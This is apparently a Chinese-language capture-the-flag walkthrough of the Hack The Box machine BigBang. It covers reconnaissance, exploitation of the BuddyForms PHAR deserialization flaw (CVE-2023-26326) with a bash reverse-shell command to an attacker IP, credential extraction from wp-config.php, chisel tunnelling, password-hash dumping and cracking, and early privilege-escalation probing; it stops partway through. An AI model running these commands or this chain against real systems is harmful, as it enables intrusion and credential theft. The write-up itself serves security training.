信息收集
端口扫描
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 d4:15:77:1e:82:2b:2f:f1:cc:96:c6:28:c1:86:6b:3f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBET3VRLx4oR61tt3uTowkXZzNICnY44UpSL7zW4DLrn576oycUCy2Tvbu7bRvjjkUAjg4G080jxHLRJGI4NJoWQ=
| 256 6c:42:60:7b:ba:ba:67:24:0f:0c:ac:5d:be:92:0c:66 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILbYOg6bg7lmU60H4seqYXpE3APnWEqfJwg1ojft/DPI
80/tcp open http syn-ack ttl 62 Apache httpd 2.4.62
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://blog.bigbang.htb/
|_http-server-header: Apache/2.4.62 (Debian)
OS fingerprint not ideal because: maxTimingRatio (1.826000e+00) is greater than 1.4
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 2.6.32 - 3.10 (96%), Linux 5.0 - 5.14 (94%), Linux 4.15 (93%), MikroTik RouterOS 6.36 - 6.48 (Linux 3.3.5) (93%), Linux 3.2 - 4.14 (93%), Linux 5.4 - 5.10 (93%), OpenWrt 21.02 (Linux 5.4) (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%), Linux 3.8 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=4/1%OT=22%CT=1%CU=34085%PV=Y%DS=2%DC=T%G=N%TM=67EB9888%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=B)
SEQ(SP=107%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=8)
OPS(O1=M542ST11NW7%O2=M542ST11NW7%O3=M542NNT11NW7%O4=M542ST11NW7%O5=M542ST11NW7%O6=M542ST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%T=40%W=FAF0%O=M542NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 231.675 days (since Mon Aug 12 11:28:51 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: blog.bigbang.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 11.47 ms 10.10.16.1
2 14.04 ms 10.10.11.52
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:40
Completed NSE at 03:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:40
Completed NSE at 03:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:40
Completed NSE at 03:40, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2054.26 seconds
Raw packets sent: 88907 (3.914MB) | Rcvd: 88770 (3.552MB)指纹识别
┌──(kali㉿kali)-[~]
└─$ whatweb http://blog.bigbang.htb
http://blog.bigbang.htb [200 OK] Apache[2.4.62], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.62 (Debian)], IP[10.10.11.52], JQuery[3.7.1], MetaGenerator[WordPress 6.5.4], PHP[8.3.2], PasswordField[pwd], Script[importmap,module,text/html,text/javascript], Title[BigBang], UncommonHeaders[link], WordPress[6.5.4], X-Powered-By[PHP/8.3.2]知道这个网站是WordPress搭建的
目录扫描
dirsearch
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u blog.bigbang.htb -t 50 -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460
Output File: /home/kali/reports/_blog.bigbang.htb/_25-04-01_03-57-25.txt
Target: http://blog.bigbang.htb/
[03:57:28] Starting:
[03:58:48] 403 - 281B - /.ht_wsr.txt
[03:58:48] 403 - 281B - /.httr-oauth
[03:58:48] 403 - 281B - /.htaccess.save
[03:58:48] 403 - 281B - /.htpasswd_test
[03:58:48] 403 - 281B - /.htaccess_orig
[03:58:48] 403 - 281B - /.html
[03:58:48] 403 - 281B - /.htaccessOLD
[03:58:48] 403 - 281B - /.htaccessBAK
[03:58:48] 403 - 281B - /.htaccess.orig
[03:58:48] 403 - 281B - /.htaccess_sc
[03:58:48] 403 - 281B - /.htaccess.bak1
[03:58:48] 403 - 281B - /.htm
[03:58:48] 403 - 281B - /.htaccess_extra
[03:58:48] 403 - 281B - /.htpasswds
[03:58:48] 403 - 281B - /.htaccess.sample
[03:58:48] 403 - 281B - /.htaccessOLD2
[04:05:08] 301 - 0B - /index.php -> http://blog.bigbang.htb/
[04:05:12] 301 - 0B - /index.php/login/ -> http://blog.bigbang.htb/login/
[04:05:28] 200 - 7KB - /license.txt
[04:07:54] 200 - 3KB - /readme.html
[04:08:14] 403 - 281B - /server-status
[04:08:14] 403 - 281B - /server-status/
[04:10:43] 301 - 323B - /wp-admin -> http://blog.bigbang.htb/wp-admin/
[04:10:46] 409 - 3KB - /wp-admin/setup-config.php
[04:10:47] 302 - 0B - /wp-admin/ -> http://blog.bigbang.htb/wp-login.php?redirect_to=http%3A%2F%2Fblog.bigbang.htb%2Fwp-admin%2F&reauth=1
[04:10:47] 400 - 1B - /wp-admin/admin-ajax.php
[04:10:47] 200 - 0B - /wp-config.php
[04:10:47] 200 - 490B - /wp-admin/install.php
[04:11:00] 301 - 325B - /wp-content -> http://blog.bigbang.htb/wp-content/
[04:11:00] 403 - 281B - /wp-content/plugins/akismet/admin.php
[04:11:00] 500 - 0B - /wp-content/plugins/hello.php
[04:11:00] 200 - 0B - /wp-content/
[04:11:01] 200 - 476B - /wp-content/uploads/
[04:11:01] 200 - 415B - /wp-content/upgrade/
[04:11:01] 403 - 281B - /wp-content/plugins/akismet/akismet.php
[04:11:13] 200 - 0B - /wp-includes/rss-functions.php
[04:11:14] 302 - 0B - /wp-signup.php -> http://blog.bigbang.htb/?p=1
[04:11:14] 200 - 0B - /wp-cron.php
[04:11:14] 200 - 2KB - /wp-login.php
[04:11:19] 200 - 5KB - /wp-includes/
[04:11:25] 405 - 42B - /xmlrpc.php
Task Completed gobuster
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://blog.bigbang.htb/ -t 30 -w ./wordlists/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt --exclude-length 0
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://blog.bigbang.htb/
[+] Method: GET
[+] Threads: 30
[+] Wordlist: ./wordlists/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt
[+] Negative Status codes: 404
[+] Exclude Length: 0
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-login.php (Status: 200) [Size: 5790]
/xmlrpc.php (Status: 405) [Size: 42]
/license.txt (Status: 200) [Size: 19915]
/readme.html (Status: 200) [Size: 7401]
/.htaccess (Status: 403) [Size: 281]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-mail.php (Status: 403) [Size: 2501]
/wp-links-opml.php (Status: 200) [Size: 222]
/.html (Status: 403) [Size: 281]
/.htpasswd (Status: 403) [Size: 281]
/.htm (Status: 403) [Size: 281]
/.htpasswds (Status: 403) [Size: 281]因为网络问题,扫描到后面经常报错,就不复制进来了
wordpress扫描
继续用wpscan扫描
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://blog.bigbang.htb/ -e ap,vt,tt,u --plugins-detection aggressive --detection-mode aggressive --force --random-user-agent --api-token xxxxxxxxxxxxxxxxxxx
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://blog.bigbang.htb/ [10.10.11.52]
[+] Started: Tue Apr 1 09:47:49 2025
Interesting Finding(s):
[+] XML-RPC seems to be enabled: http://blog.bigbang.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://blog.bigbang.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://blog.bigbang.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://blog.bigbang.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.5.4 identified (Insecure, released on 2024-06-05).
| Found By: Atom Generator (Aggressive Detection)
| - http://blog.bigbang.htb/?feed=atom, <generator uri="https://wordpress.org/" version="6.5.4">WordPress</generator>
| Confirmed By: Style Etag (Aggressive Detection)
| - http://blog.bigbang.htb/wp-admin/load-styles.php, Match: '6.5.4'
|
| [!] 3 vulnerabilities identified:
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
| Fixed in: 6.5.5
| References:
| - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
| Fixed in: 6.5.5
| References:
| - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
| Fixed in: 6.5.5
| References:
| - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:15:21 <============= > (16346 / 109787) 14.88% ETA: 01:27:48
Checking Known Locations - Time: 01:49:30 <==============================================================================================> (109787 / 109787) 100.00% Time: 01:49:30
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://blog.bigbang.htb/wp-content/plugins/akismet/
| Latest Version: 5.3.7
| Last Updated: 2025-02-14T18:49:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://blog.bigbang.htb/wp-content/plugins/akismet/, status: 403
|
| [!] 1 vulnerability identified:
|
| [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 3.1.5
| References:
| - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
| - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
| - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
|
| The version could not be determined.
[+] buddyforms
| Location: http://blog.bigbang.htb/wp-content/plugins/buddyforms/
| Last Updated: 2025-02-27T23:01:00.000Z
| Readme: http://blog.bigbang.htb/wp-content/plugins/buddyforms/readme.txt
| [!] The version is out of date, the latest version is 2.8.17
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://blog.bigbang.htb/wp-content/plugins/buddyforms/, status: 200
|
| [!] 13 vulnerabilities identified:
|
| [!] Title: BuddyForms < 2.7.8 - Unauthenticated PHAR Deserialization
| Fixed in: 2.7.8
| References:
| - https://wpscan.com/vulnerability/a554091e-39d1-4e7e-bbcf-19b2a7b8e89f
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26326
|
| [!] Title: Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting
| Fixed in: 2.8.3
| References:
| - https://wpscan.com/vulnerability/7fd1ad0e-9db9-47b7-9966-d3f5a8771571
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33999
|
| [!] Title: BuddyForms < 2.8.2 - Contributor+ Stored XSS
| Fixed in: 2.8.2
| References:
| - https://wpscan.com/vulnerability/7ebb0593-3c90-404c-9966-f87690395be9
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25981
|
| [!] Title: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) < 2.8.8 - Missing Authorization
| Fixed in: 2.8.8
| References:
| - https://wpscan.com/vulnerability/3eb25546-5aa3-4e58-b563-635ecdb21097
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1158
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/198cb3bb-73fe-45ae-b8e0-b7ee8dda9547
|
| [!] Title: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) < 2.8.8 - Missing Authorization to Unauthenticated Media Deletion
| Fixed in: 2.8.8
| References:
| - https://wpscan.com/vulnerability/b6e2f281-073e-497f-898b-23d6220b20c7
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1170
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/380c646c-fd95-408a-89eb-3e646768bbc5
|
| [!] Title: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) < 2.8.8 - Missing Authorization to Unauthenticated Media Upload
| Fixed in: 2.8.8
| References:
| - https://wpscan.com/vulnerability/71e4f4c1-20ba-42ac-8ac7-e798c4bc611d
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1169
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/6d14a90d-65ea-45da-956b-0735e2e2b538
|
| [!] Title: BuddyForms < 2.8.6 - Reflected Cross-Site Scripting via page
| Fixed in: 2.8.6
| References:
| - https://wpscan.com/vulnerability/72c096b3-55bd-4614-8029-69900db79416
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30198
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/701d6bee-6eb2-4497-bf54-fbc384d9d2e5
|
| [!] Title: BuddyForms < 2.8.9 - Unauthenticated Arbitrary File Read and Server-Side Request Forgery
| Fixed in: 2.8.9
| References:
| - https://wpscan.com/vulnerability/3f8082a0-b4b2-4068-b529-92662d9be675
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32830
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/23d762e9-d43f-4520-a6f1-c920417a2436
|
| [!] Title: BuddyForms < 2.8.10 - Email Verification Bypass due to Insufficient Randomness
| Fixed in: 2.8.10
| References:
| - https://wpscan.com/vulnerability/aa238cd4-4329-4891-b4ff-8268a5e18ae2
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5149
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5c8d361-698b-4abd-bcdd-0361d3fd10c5
|
| [!] Title: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) < 2.8.12 - Authenticated (Contributor+) Privilege Escalation
| Fixed in: 2.8.12
| References:
| - https://wpscan.com/vulnerability/ca0fa099-ad8a-451f-8bb3-2c68def0ac6f
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8246
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/40760f60-b81a-447b-a2c8-83c7666ce410
|
| [!] Title: BuddyForms < 2.8.13 - Authenticated (Editor+) Stored Cross-Site Scripting
| Fixed in: 2.8.13
| References:
| - https://wpscan.com/vulnerability/61885f61-bd62-4530-abe3-56f89bcdd8e4
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47377
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac8a06f5-4560-401c-b762-5422b624ba84
|
| [!] Title: Frontend Content Forms for User Submissions (UGC) < 2.8.14 - Authenticated (Contributor+) Stored Cross-Site Scripting
| Fixed in: 2.8.14
| References:
| - https://wpscan.com/vulnerability/4c9e1b3a-d2ac-4864-8349-bf1ac037da14
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12037
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/accd4f34-4e10-4c83-96c3-c2a078ecd5cc
|
| [!] Title: Frontend Content Forms for User Submissions (UGC) < 2.8.16 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'buddyforms_nav' Shortcode
| Fixed in: 2.8.16
| References:
| - https://wpscan.com/vulnerability/972293b8-b0a3-4c7e-8cd7-1658732b7869
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12038
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/ff0568e2-3a1e-4ed6-835a-37e3d07d7b63
|
| Version: 2.7.7 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://blog.bigbang.htb/wp-content/plugins/buddyforms/readme.txt
[+] Enumerating Vulnerable Themes (via Aggressive Methods)
Checking Known Locations - Time: 00:00:25 <====================================================================================================> (652 / 652) 100.00% Time: 00:00:25
[i] No themes Found.
[+] Enumerating Timthumbs (via Aggressive Methods)
Checking Known Locations - Time: 00:01:21 <==================================================================================================> (2568 / 2568) 100.00% Time: 00:01:21
[i] No Timthumbs Found.
[+] Enumerating Users (via Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <======================================================================================================> (10 / 10) 100.00% Time: 00:00:02
[i] User(s) Identified:
[+] root
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] shawking
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 16
[+] Finished: Tue Apr 1 11:39:31 2025
[+] Requests Done: 113077
[+] Cached Requests: 4
[+] Data Sent: 33.828 MB
[+] Data Received: 16.025 MB
[+] Memory used: 432.098 MB
[+] Elapsed time: 01:51:42
重点关注此漏洞
| [!] Title: BuddyForms < 2.7.8 – Unauthenticated PHAR Deserialization
| Fixed in: 2.7.8
| References:
| – https://wpscan.com/vulnerability/a554091e-39d1-4e7e-bbcf-19b2a7b8e89f
| – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26326
漏洞利用
参考文章如下:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26326
https://www.tenable.com/security/research/tra-2023-7
https://cve.imfht.com/detail/CVE-2023-26326
https://github.com/mesudmammad1/CVE-2023-26326_Buddyform_exploit
运行脚本
python exploit.py "http://blog.bigbang.htb/wp-admin/admin-ajax.php" 'bash -c "bash -i >& /dev/tcp/10.10.16.21/8888 0>&1"'www-data权限
拿到www-data的shell
www-data@8e3a72b5e980:/var/www/html/wordpress$ ls
ls
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
www-data@8e3a72b5e980:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'wp_user' );
/** Database password */
define( 'DB_PASSWORD', 'wp_password' );
/** Database hostname */
define( 'DB_HOST', '172.17.0.1' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '(6xl?]9=.f9(<(yxpm9]5<wKsyEc+y&MV6CjjI(0lR2)_6SWDnzO:[g98nOOPaeK' );
define( 'SECURE_AUTH_KEY', 'F<3>KtCm^zs]Mxm Rr*N:&{SWQexFn@ wnQ+bTN5UCF-<gMsT[mH$m))T>BqL}%8' );
define( 'LOGGED_IN_KEY', ':{yhPsf}tZRfMAut2$Fcne/.@Vs>uukS&JB04 Yy3{`$`6p/Q=d^9=ZpkfP,o%l]' );
define( 'NONCE_KEY', 'sC(jyKu>gY(,&: KS#Jh7x?/CB.hy8!_QcJhPGf@3q<-a,D#?!b}h8 ao;g[<OW;' );
define( 'AUTH_SALT', '_B& tL]9I?ddS! 0^_,4M)B>aHOl{}e2P(l3=!./]~v#U>dtF7zR=~LnJtLgh&KK' );
define( 'SECURE_AUTH_SALT', '<Cqw6ztRM/y?eGvMzY(~d?:#]v)em`.H!SWbk.7Fj%b@Te<r^^Vh3KQ~B2c|~VvZ' );
define( 'LOGGED_IN_SALT', '_zl+LT[GqIV{*Hpv>]H:<U5oO[w:]?%Dh(s&Tb-2k`1!WFqKu;elq7t^~v7zS{n[' );
define( 'NONCE_SALT', 't2~PvIO1qeCEa^+J}@h&x<%u~Ml{=0Orqe]l+DD7S}%KP}yi(6v$mHm4cjsK,vCZ' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
www-data@8e3a72b5e980:/var/www/html/wordpress$
内网渗透
数据库配置文件——端口转发——拿到shawking权限
找到wp-config.php存在数据库配置信息,通过chisel转发流量
在攻击机(10.10.16.21)启动Chisel服务端
监听任意端口(例如 12345),并启用反向代理模式:
./chisel server -p 12345 --reverse在目标机(172.17.0.1)运行Chisel客户端
连接攻击机的服务端,并设置反向转发规则:
./chisel client 10.10.16.21:12345 R:33306:172.17.0.1:3306R:33306:172.17.0.1:3306:表示将攻击机的 33306 端口流量转发到目标机的 172.17.0.1:3306 端口。
mysql的密码是wp_password
┌──(root㉿kali)-[/home/kali/tunnel]
└─# mysql -D 'wordpress' -u 'wp_user' -h 10.10.16.21 -P 33306 --skip-ssl -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
showWelcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 2260
Server version: 8.0.32 MySQL Community Server - GPL
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.854 sec)
MySQL [wordpress]> select * from wp_users
-> ;
+----+------------+------------------------------------+---------------+----------------------+-------------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+----------------------+-------------------------+---------------------+---------------------+-------------+-----------------+
| 1 | root | $P$Beh5HLRUlTi1LpLEAstRyXaaBOJICj1 | root | root@bigbang.htb | http://blog.bigbang.htb | 2024-05-31 13:06:58 | | 0 | root |
| 3 | shawking | $P$Br7LUHG9NjNk6/QSYm2chNHfxWdoK./ | shawking | shawking@bigbang.htb | | 2024-06-01 10:39:55 | | 0 | Stephen Hawking |
+----+------------+------------------------------------+---------------+----------------------+-------------------------+---------------------+---------------------+-------------+-----------------+
2 rows in set (0.765 sec)
MySQL [wordpress]>
得到shawking的wordpress的md5哈希,进行爆破
┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 14 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
quantumphysics (?)
1g 0:00:00:44 DONE (2025-04-02 10:08) 0.02226g/s 99206p/s 99206c/s 99206C/s quarashi33..quag69
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
得到密码为quantumphysics
连接shawking用户
shawking@bigbang:~$ ls
snap user.txt
shawking@bigbang:~$ cat user.txt
xxxxxxxxxxxxxxxxx
权限提升
grafana.db数据库文件——9090,3000端口
拿到user.txt,查看开放端口,发现9090,3000,上传linpeas.sh,发现grafana.db数据库文件
shawking@bigbang:/tmp$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:46773 0.0.0.0:* LISTEN
tcp 0 0 172.17.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:9090 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 :::80 :::* LISTEN
udp 0 0 127.0.0.53:53 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:* ╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /opt/data/grafana.db: SQLite 3.x database, last written using SQLite version 3044000, file counter 856, database pages 245, cookie 0x1bd, schema 4, UTF-8, version-valid-for 856
将9090和3000端口转发到本地
ssh -L 9090:127.0.0.1:9090 shawking@10.10.11.52ssh -L 3000:127.0.0.1:3000 shawking@10.10.11.529090直接访问是404,进行目录爆破
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u http://127.0.0.1:9090/ -t 50 -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460
Output File: /home/kali/reports/http_127.0.0.1_9090/__25-04-02_10-26-42.txt
Target: http://127.0.0.1:9090/
[10:26:42] Starting:
[10:28:35] 405 - 153B - /login
Task Completed
发现login目录,发现要求用post发送json格式的报文(这个探测很重要)
┌──(root㉿kali)-[/home/kali]
└─# curl http://127.0.0.1:9090/
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
